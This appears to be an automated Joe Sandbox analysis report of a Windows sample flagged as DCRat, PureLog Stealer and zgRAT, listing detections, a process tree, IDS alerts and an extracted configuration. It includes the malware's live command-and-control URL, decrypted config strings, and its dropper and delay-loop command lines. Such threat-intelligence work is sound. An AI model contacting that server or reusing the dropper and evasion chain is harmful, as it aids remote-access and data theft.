Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7vP2IvNXqx.exe

Overview

General Information

Sample name:7vP2IvNXqx.exe
renamed because original name is a hash value
Original sample name:1a3a764c4b4974435dba8926e7137766.exe
Analysis ID:1583844
MD5:1a3a764c4b4974435dba8926e7137766
SHA1:7cf7f1525fc7deb3d8523ac550a3787765ce6742
SHA256:2028b4c9f540e5d74ce2ad0f9a443badc827f1f70af23dfd01455747e564b1a2
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 7vP2IvNXqx.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\7vP2IvNXqx.exe" MD5: 1A3A764C4B4974435DBA8926E7137766)
    • wscript.exe (PID: 7328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • winIntorefruntimebroker.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
          • cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7572 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7588 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7652 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
              • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 7764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • PING.EXE (PID: 7780 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7952 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                  • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • chcp.com (PID: 8080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                    • w32tm.exe (PID: 8096 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 2284 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                      • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • chcp.com (PID: 5776 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                        • w32tm.exe (PID: 4464 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                        • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 5796 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                          • cmd.exe (PID: 7308 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                            • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • chcp.com (PID: 2000 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                            • w32tm.exe (PID: 7428 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7352 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                              • cmd.exe (PID: 6276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                • PING.EXE (PID: 7492 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7600 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                  • cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                    • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                    • chcp.com (PID: 7672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                    • w32tm.exe (PID: 7688 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 3384 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                      • cmd.exe (PID: 4136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                        • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                        • chcp.com (PID: 416 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                        • w32tm.exe (PID: 5724 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                        • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7780 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                          • cmd.exe (PID: 8016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                            • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                            • chcp.com (PID: 8080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                            • w32tm.exe (PID: 7964 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 8004 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                              • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                • chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                • w32tm.exe (PID: 6876 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7056 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                                  • cmd.exe (PID: 8172 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                    • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                    • chcp.com (PID: 5968 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                    • w32tm.exe (PID: 5576 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 1608 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                                      • cmd.exe (PID: 4340 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                        • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                        • chcp.com (PID: 4336 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
7vP2IvNXqx.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    7vP2IvNXqx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 7 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.7vP2IvNXqx.exe.792c722.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.7vP2IvNXqx.exe.792c722.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.7vP2IvNXqx.exe.7015722.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.7vP2IvNXqx.exe.7015722.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.7vP2IvNXqx.exe.792c722.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: WScript or CScript Dropper
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7vP2IvNXqx.exe", ParentImage: C:\Users\user\Desktop\7vP2IvNXqx.exe, ParentProcessId: 7280, ParentProcessName: 7vP2IvNXqx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , ProcessId: 7328, ProcessName: wscript.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7vP2IvNXqx.exe", ParentImage: C:\Users\user\Desktop\7vP2IvNXqx.exe, ParentProcessId: 7280, ParentProcessName: 7vP2IvNXqx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , ProcessId: 7328, ProcessName: wscript.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-03T18:32:05.218406+010020480951A Network Trojan was detected192.168.2.449730206.188.197.2480TCP
                                    2025-01-03T18:32:16.780963+010020480951A Network Trojan was detected192.168.2.449737206.188.197.2480TCP
                                    2025-01-03T18:32:23.515197+010020480951A Network Trojan was detected192.168.2.449738206.188.197.2480TCP
                                    2025-01-03T18:32:30.124537+010020480951A Network Trojan was detected192.168.2.449739206.188.197.2480TCP
                                    2025-01-03T18:32:36.765117+010020480951A Network Trojan was detected192.168.2.449740206.188.197.2480TCP
                                    2025-01-03T18:32:47.468862+010020480951A Network Trojan was detected192.168.2.449741206.188.197.2480TCP
                                    2025-01-03T18:32:54.686916+010020480951A Network Trojan was detected192.168.2.449743206.188.197.2480TCP
                                    2025-01-03T18:33:01.280651+010020480951A Network Trojan was detected192.168.2.449780206.188.197.2480TCP
                                    2025-01-03T18:33:08.764962+010020480951A Network Trojan was detected192.168.2.449827206.188.197.2480TCP
                                    2025-01-03T18:33:15.561834+010020480951A Network Trojan was detected192.168.2.449868206.188.197.2480TCP
                                    2025-01-03T18:33:22.155558+010020480951A Network Trojan was detected192.168.2.449907206.188.197.2480TCP
                                    2025-01-03T18:33:28.718020+010020480951A Network Trojan was detected192.168.2.449945206.188.197.2480TCP
                                    2025-01-03T18:33:39.030477+010020480951A Network Trojan was detected192.168.2.450010206.188.197.2480TCP
                                    2025-01-03T18:33:45.218167+010020480951A Network Trojan was detected192.168.2.450015206.188.197.2480TCP
                                    2025-01-03T18:33:55.796071+010020480951A Network Trojan was detected192.168.2.450016206.188.197.2480TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 7vP2IvNXqx.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\nhkbaghNki.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\bviytIjYVg.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\0WKriXx1WO.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\AppData\Local\Temp\qlEmwzstBs.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\ujuZrulyBl.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\ECvQfnJznV.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\DoC45cXmCX.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeReversingLabs: Detection: 78%
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeReversingLabs: Detection: 78%
                                    Source: C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exeReversingLabs: Detection: 78%
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeReversingLabs: Detection: 78%
                                    Source: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exeReversingLabs: Detection: 78%
                                    Source: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exeReversingLabs: Detection: 78%
                                    Multi AV Scanner detection for submitted file
                                    Source: 7vP2IvNXqx.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 7vP2IvNXqx.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/","LinejsProcessauthFlowerTestLocal"]]
                                    Source: 7vP2IvNXqx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
